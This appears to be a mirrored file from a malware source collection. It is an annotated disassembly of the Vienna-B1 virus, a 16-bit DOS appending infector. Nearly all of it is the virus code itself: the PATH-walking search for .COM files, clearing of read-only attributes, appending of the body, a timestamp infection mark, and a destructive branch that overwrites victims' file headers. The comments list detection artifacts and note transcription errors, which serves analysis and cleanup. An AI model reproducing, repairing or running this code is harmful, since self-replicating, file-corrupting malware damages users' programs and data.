mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-20 18:36:10 +00:00
; disassembly of vienna-b1 virus
;
; What this listing is: an annotated disassembly of a 16-bit DOS .COM file
; (org 0100h) that carries a Vienna-family appending infector, kept here for
; study.  It is NOT an assemblable source and the "NASM" tag on the page is
; wrong: the mnemonics are MASM-style ("word ptr", prefix written as "es mov"),
; a few immediates were transcribed without the "h" suffix, and the variable
; area at the end is a DEBUG-style hex dump whose opcode column is noise.
;
; Layout of this particular image (all addresses below are absolute for it):
;   0100h  jmp label1            3-byte jmp the virus wrote over the host's
;                                first 3 bytes; the saved original header at
;                                031Ch ends in 48h ('H'), which is why the
;                                string below starts at "ello"
;   0103h  original host code    the 25-byte "hello world" program
;   0119h  label1                start of the 0288h (648) byte virus body
;   0312h  start_of_variables    work area, addressed through si everywhere
;   0371h  DTA (si+5Fh)          used for the *.COM directory search
;   039Ch  far jmp (si+8Ah)      5 bytes used only by the destructive branch
;
; Register roles inside the body:
;   si   base of the variable area (0312h here; patched per victim, see label18)
;   bx   copy of si while a search path is built; later the open file handle
;   di   write cursor into the filename buffer
;
; Variable area offsets from si, as read and written by the code below:
;   +00h word  caller's DTA offset        +02h word  caller's DTA segment
;   +04h word  victim's file time         +06h word  victim's file date
;   +08h word  victim's attributes        +0Ah 3 bytes  victim's original header
;   +0Dh byte  E9 (jmp opcode)            +0Eh word  jmp displacement (size-3)
;   +10h "*.COM",0                        +16h word  cursor into the PATH= string
;   +18h word  end of the directory prefix in the filename buffer
;   +1Ah "PATH="                          +1Fh asciiz filename buffer
;   +5Fh DTA                              +8Ah 5-byte far jmp
;
; Observable artifacts, useful when looking for or cleaning up this family:
;   - infected .COM files grow by exactly 0288h (648) bytes and begin with
;     E9 xx xx where xx xx = original size - 3
;   - the file's timestamp keeps its date but the 2-second field is forced to
;     31 (displays as 62 s); the virus uses that as its "already done" mark
;   - candidates are .COM files of 10..64000 bytes in the current directory
;     and then in each PATH= directory; read-only/hidden files are included
;     (search attribute 3) and read-only is cleared before writing
;   - roughly one run in eight takes a destructive branch that overwrites the
;     victim's first 5 bytes instead of infecting it
jmp label1 ;0100h: the 3-byte jmp placed by the virus; the host's real first
;bytes are kept at si+0Ah and restored as the first thing label1 does
message:
db "ello, world!$" ;*************
mov ah,09h ;print string ; part of *
mov dx,message ;point to string ; original *
int 21h ;call msdos ; com file. *
int 20h ;terminate program ;*************
label1: ;0119h - virus entry; everything from here to the end of the
;variable area is what gets appended to a victim (0288h bytes)
push cx ;kept for the host, popped again at label3
mov dx,0312h ;start of variables - the imm16 of this instruction (011Bh,
;si-1F7h) is patched before each infection so that the copy
;written into a victim addresses its own variable area
cld ;clear direction
mov si,dx ;si = start of variables
add si,000Ah ;si+0Ah = the host's original first 3 bytes
mov di,0100h ;destination = 0100h
mov cx,0003 ;three bytes to move
repz movsb ;put the original header back so the host runs normally later
mov si,dx ;si = 0312h (start of variables)
mov ah,30h ;get dos version number
int 21h ;call msdos
cmp al,00h ;old version?  (major version 0 = DOS 1.x, which lacks the
;handle and find-first/next functions used below)
jnz label2 ;no
jmp label3 ;yes - do nothing, go straight to the host
label2:
push es ;store extra segment
mov ah,2fh ;get DTA address
int 21h ;call msdos
mov [si+0000h],bx ;save DTA offset
mov [si+0002],es ;save DTA segment (both put back at label6)
pop es ;restore extra segment address
mov dx,005fh ;
nop ;(no effect)
add dx,si ;pointer to new DTA address (si+5Fh = 0371h)
mov ah,1ah ;set DTA address
int 21h ;call msdos
push es ;save extra segment address again
push si ;save source index register
mov es,[002ch] ;PSP offset 2Ch = segment of the environment block
mov di,0000h ;scan the environment from its start
label4: ;find the 5-byte string at si+1Ah ("PATH=") in the environment
pop si
push si ;si = variable base again (kept on the stack across the loop)
add si,001ah ;si -> "PATH="
lodsb ;al = first byte of the pattern ('P')
mov cx,8000h ;scan at most 32 KiB of environment
repnz scasb ;es:di -> byte after the next 'P'
mov cx,0004h ;the remaining 4 bytes must match too
label7:
lodsb ;get byte from source
scasb ;compare with the environment byte (scasb compares, it does not store)
jnz label4 ;mismatch - look for the next 'P'
loop label7
pop si ;restore source index register
pop es ;and extra segment
mov [si+0016h],di ;si+16h = cursor just past "PATH=" in the environment
mov di,si
add di,001fh
mov bx,si ;bx = variable base, used by label5 and label13
add si,001fh
mov di,si ;di = filename buffer (si+1Fh = 0331h), still empty
jmp label5 ;first pass: "*.COM" in the current directory
label13: ;this directory is exhausted - advance to the next PATH= entry
cmp word ptr [si+0016h],00h ;cursor cleared at label9 means no entry left
jnz label5 ;NOTE(review): as transcribed this would re-run the same search;
;the "push ds" block below has no label and is otherwise
;unreachable, so this jnz almost certainly targets it (skipping
;"jmp label6") and "label5" here looks like a transcription slip
jmp label6
push ds
push si
es mov ds,[002ch] ;ds = environment segment (es still = the PSP here)
mov di,si
es mov si,[di+0016h] ;si = PATH cursor, read from the variable area through es
add di,001fh ;di = filename buffer
label10: ;copy one PATH entry into the buffer
lodsb ;get byte
cmp al,3bh ;';' ends this entry
jz label8
cmp al,00h ;NUL ends the whole PATH= string
jz label9
stosb ;store byte
jmp label10
label9:
mov si,0000h ;cursor = 0: this was the last entry
label8:
pop bx ;bx = variable base
pop ds
mov [bx+0016h],si ;store the advanced (or cleared) cursor
cmp byte ptr [di-01h],5ch ;does the directory already end in '\'?
jz label5
mov al,5ch
stosb ;store byte (append '\')
label5: ;append "*.COM" to the directory prefix and start a search
mov [bx+0018h],di ;si+18h = where a found filename will be appended (label15)
mov si,bx
add si,0010h ;si -> "*.COM",0
mov cx,0006h
repz movsb
mov si,bx
mov ah,4eh ;search for first match
mov dx,001fh ;pointer to asciiz file spec.-si
nop ;(no effect)
add dx,si ;pointer to asciiz file spec.
mov cx,0003h ;attribute to use in the search (read-only + hidden are included)
int 21h ;call msdos
jmp label11
label14:
mov ah,4fh ;search for next match
int 21h ;call msdos
label11:
jnb label12 ;found one - examine it
jmp label13 ;no (more) matches here - next PATH= entry
label12: ;candidate found; DTA fields are read at fixed offsets from si
;(DTA = si+5Fh, so si+75h = DTA+16h, si+79h = DTA+1Ah, si+7Dh = DTA+1Eh)
mov ax,[si+0075h] ;DTA+16h = file time
and al,1fh ;keep the 2-second field
cmp al,1fh ;31 = already infected (the mark written at label19)
jz label14
cmp word ptr [si+0079h],0fa00h ;DTA+1Ah = low word of the size; skip > 64000
ja label14
cmp word ptr [si+0079h],0ah ;skip < 10 bytes (nothing to read a header from)
jb label14
mov di,[si+0018h] ;di = end of the directory prefix in the filename buffer
push si
add si,007dh ;DTA+1Eh = found filename, asciiz
label15: ;append the name to the prefix, NUL included
lodsb
stosb
cmp al,00h
jnz label15
pop si
mov ax,4300h ;get file attributes
mov dx,001fh ;pointer to asciiz file spec. -si
nop ;(no effect)
add dx,si ;pointer to file spec.
int 21h ;call msdos
mov [si+0008h],cx ;save the original attributes
mov ax,4301 ;set file attributes (transcript lacks the "h"; the DOS function
;is 4301h, written correctly at label17)
and cx,0fffeh ;new attributes: read-only bit cleared
mov dx,001fh ;pointer to asciiz file spec. -si
nop ;(no effect)
add dx,si ;pointer to asciiz file spec.
int 21h ;call msdos
mov ax,3d02h ;open file (handle), read/write access
mov dx,001fh ;pointer to asciiz file spec. -si
nop ;(no effect)
add dx,si ;pointer to asciiz file spec.
int 21h ;call msdos
jnb label16
jmp label17 ;open failed - only put the attributes back
label16:
mov bx,ax ;bx = file handle from here on
mov ax,5700h ;get time and date
int 21h ;call msdos
mov [si+0004],cx ;store time
mov [si+0006],dx ;store date (both put back at label19)
mov ah,2ch ;get system time (dh = seconds)
int 21h ;call msdos
and dh,07h ;low 3 bits of the seconds zero: roughly one call in eight ...
jnz label18 ;... otherwise the normal infection path
mov ah,40h ;write to file or device (handle)
mov cx,0005h ;number of bytes to write
mov dx,si ;get file spec. address -8ah
add dx,008ah ;si+8Ah = the 5-byte far jmp at 039Ch
int 21h ;call msdos - destructive branch: overwrites the victim's first
;5 bytes at the current (start) position, no body is appended
jmp label19
nop
label18: ;normal infection path
mov ah,3fh ;read file or device (handle)
mov cx,0003h ;number of bytes to read
mov dx,000ah ;point to buffer -si
nop ;(no effect)
add dx,si ;si+0Ah = save slot for the victim's original first 3 bytes
int 21h ;call msdos
jb label19
cmp ax,0003h ;number of bytes read
jnz label19
mov ax,4202h ;move file pointer
;offset from end of file
mov cx,0000h ;offset desired
mov dx,0000h ;as above
int 21h ;call msdos (ax = file size, low word)
jb label19
mov cx,ax
sub ax,0003h ;jmp displacement = size - 3 (the jmp itself is 3 bytes long)
mov [si+000eh],ax ;si+0Eh = displacement of the E9 jmp kept at si+0Dh
add cx,02f9h ;variable base inside the victim = 0100h + size + (0312h-0119h)
mov di,si
sub di,01f7h ;di -> imm16 of the "mov dx,0312h" at label1 (011Bh)
mov [di],cx ;patch it so the appended copy addresses its own variables
mov ah,40h ;write to file or device (handle)
mov cx,0288h ;number of bytes to write: the whole body, label1 .. 03A0h
mov dx,si ;
sub dx,01f9h ;dx = pointer to buffer of data write = label1 (si-1F9h = 0119h)
int 21h ;call msdos - append the body at end of file
jb label19
cmp ax,0288h ;288h bytes written?
jnz label19
mov ax,4200h ;move file pointer
;offset from beginning of file
mov cx,0000h ;desired offset
mov dx,0000h ;desired offset
int 21h ;call msdos
jb label19
mov ah,40h ;write to file or device (handle)
mov cx,0003h ;number of bytes to write
mov dx,si ;
add dx,000dh ;si+0Dh = E9 + displacement: the victim's new first 3 bytes
int 21h ;call msdos
label19: ;put date/time back, with the seconds field forced to the mark
mov dx,[si+0006h]
mov cx,[si+0004h]
and cx,0ffe0h ;clear the 2-second field ...
or cx,001fh ;... and set it to 31 (62 s): the "already infected" mark
mov ax,5701h ;set date and time
int 21h ;call msdos
mov ah,3eh ;close file
int 21h ;call msdos
label17: ;put the attributes saved at si+08h back
mov ax,4301h ;set file attributes
mov di,[si+0008h] ;NOTE(review): as transcribed the saved word lands in di, but
;function 4301h takes the attribute word in cx (still the time
;word from label19); this listing cannot tell whether that is
;a transcription error or the variant's real behaviour
mov dx,001fh ;pointer to asciiz file spec. -si
nop ;(no effect)
add dx,si ;pointer to ascii file spec.
int 21h ;call msdos
label6: ;restore the caller's DTA
push ds ;save data segment
mov ah,1ah ;set DTA address
mov dx,[si+0000] ;retrieve original DTA
mov ds,[si+0002] ;and data segment of dta
int 21h ;call msdos
pop ds ;restore DTA
label3: ;hand control to the (restored) host at 0100h
pop cx ;undo the push cx at label1
xor ax,ax ;clear accumulator
xor bx,bx ;and bx
xor dx,dx ;and dx
xor si,si ;and si
mov di,0100h ;pointer to execution program to be
;run now virus has finished
push di
xor di,di ;clear di
ret 0ffffh ;? - pops 0100h as the return address; the 0ffffh pop count is
;as transcribed and its effect on sp is unclear (original "?" kept)

;-----------------------------------------------------------------------
; Variable area, as the original annotator captured it: a DEBUG-style dump
; (address, hex bytes, meaningless instruction decoding).  The bytes are
; data, not code - ignore the opcode column.  Offsets in the comments are
; relative to si = 0312h and match the loads and stores above.  Values are
; whatever was in the infector's work area when this copy was written.
;-----------------------------------------------------------------------
start_of_variables:
; 0312 (+00h) 80 00  caller's DTA offset (0080h = the default DTA in the PSP)
; 0314 (+02h) 3E 40  caller's DTA segment
; 0316 (+04h) D5 92  victim file time      0318 (+06h) 85 11  victim file date
; 031A (+08h) 20 00  victim attributes (20h = archive)
0312 80003E ADD BYTE PTR [BX+SI],3E
0315 40 inc ax
0316 D592 AAD 92
0318 8511 TEST dx,[BX+DI]
031A 2000 AND [BX+SI],AL

; 031C (+0Ah) EB 0E 48  this host's original first 3 bytes, restored at label1:
;                       a short jmp to 0110h followed by 'H', the letter that
;                       the 3-byte overwrite took from "Hello"
031C EB0E JMP 032ch ;jump address to place at
;beginning of source program
031E 48 DEC ax
; 031F (+0Dh) E9 16 00  the jmp written over a victim's header; the displacement
;                       at +0Eh is size-3 (0016h = 25-3 for this 25-byte host)
031F E91600 JMP 0338
; 0322 (+10h) "*.COM",0  search pattern appended at label5
db "*.COM"
; 0328 (+16h) PATH= cursor    032A (+18h) end-of-prefix pointer  (last values)
0327 0027 ADD [BX],ah
0329 0022 ADD [BP+SI],ah
032B 03
; 032C (+1Ah) "PATH="  followed at 0331 (+1Fh) by the filename buffer, which in
; this dump holds "DANGER!.COM",0 plus remnants of earlier names ("EM.COM",
; "COM") and then spaces up to 0370h
db "PATH=DANGER!.COM EM.COM"
032C 5041 ADD dx,[BX+SI+41]
032E 54 push SP
032F 48 DEC ax
0330 3D4441 cmp ax,4144
0333 4E DEC SI
0334 47 inc DI
0335 45 inc BP
0336 52 push dx
0337 212E434F AND [4F43],BP
033B 4D DEC BP
033C 00454D ADD [DI+4D],AL
033F 2E CS:
0340 43 inc BX
0341 4F DEC DI
0342 4D DEC BP
0343 0000 ADD [BX+SI],AL
0345 43 inc BX
0346 4F DEC DI
0347 4D DEC BP
0348 0020 ADD [BX+SI],ah
034A 2020 AND [BX+SI],ah
034C 2020 AND [BX+SI],ah
034E 2020 AND [BX+SI],ah
0350 2020 AND [BX+SI],ah
0352 2020 AND [BX+SI],ah
0354 2020 AND [BX+SI],ah
0356 2020 AND [BX+SI],ah
0358 2020 AND [BX+SI],ah
035A 2020 AND [BX+SI],ah
035C 2020 AND [BX+SI],ah
035E 2020 AND [BX+SI],ah
0360 2020 AND [BX+SI],ah
0362 2020 AND [BX+SI],ah
1463:0364 2020 AND [BX+SI],ah
1463:0366 2020 AND [BX+SI],ah
1463:0368 2020 AND [BX+SI],ah
1463:036A 2020 AND [BX+SI],ah
1463:036C 2020 AND [BX+SI],ah
1463:036E 2020 AND [BX+SI],ah
; 0371 (+5Fh) the DTA handed to find-first/next ("mov dx,005fh" above):
;   0371       03             search state byte
;   0372-037C  "????????COM"  the search pattern as DOS stores it (from "*.COM")
;   037D-0386  remaining search state; 0386 = 20h, found file's attribute
;   0387 (+75h) D5 92         found file's time  - tested at label12
;   0389       85 11          found file's date
;   038B (+79h) 19 00 00 00   found file's size (25 bytes) - tested at label12
;   038F (+7Dh) "DANGER!.COM",0  found filename - copied at label15
1463:0370 2003 AND [BP+DI],AL
1463:0372 3F AAS
1463:0373 3F AAS
1463:0374 3F AAS
1463:0375 3F AAS
1463:0376 3F AAS
1463:0377 3F AAS
1463:0378 3F AAS
1463:0379 3F AAS
1463:037A 43 inc BX
1463:037B 4F DEC DI
1463:037C 4D DEC BP
1463:037D 0305 ADD ax,[DI]
1463:037F 001F ADD [BX],BL
1463:0381 0020 ADD [BX+SI],ah
1463:0383 64 DB 64
1463:0384 7269 JB 03EF
1463:0386 20D5 AND CH,DL
1463:0388 92 XCHG dx,ax
1463:0389 8511 TEST dx,[BX+DI]
1463:038B 1900 SBB [BX+SI],ax
1463:038D 0000 ADD [BX+SI],AL
1463:038F 44 inc SP
1463:0390 41 inc cx
1463:0391 4E DEC SI
1463:0392 47 inc DI
1463:0393 45 inc BP
1463:0394 52 push dx
1463:0395 212E434F AND [4F43],BP
1463:0399 4D DEC BP
1463:039A 0000 ADD [BX+SI],AL
; 039C (+8Ah) EA 0B 02 13 58  the 5-byte far jmp the destructive branch writes
; over a victim's first 5 bytes (target as decoded by the transcript).  It is
; the last item of the body: 0119h + 0288h = 03A1h, so the copy ends at 03A0h.
1463:039C EA0B021358 JMP 5813:020B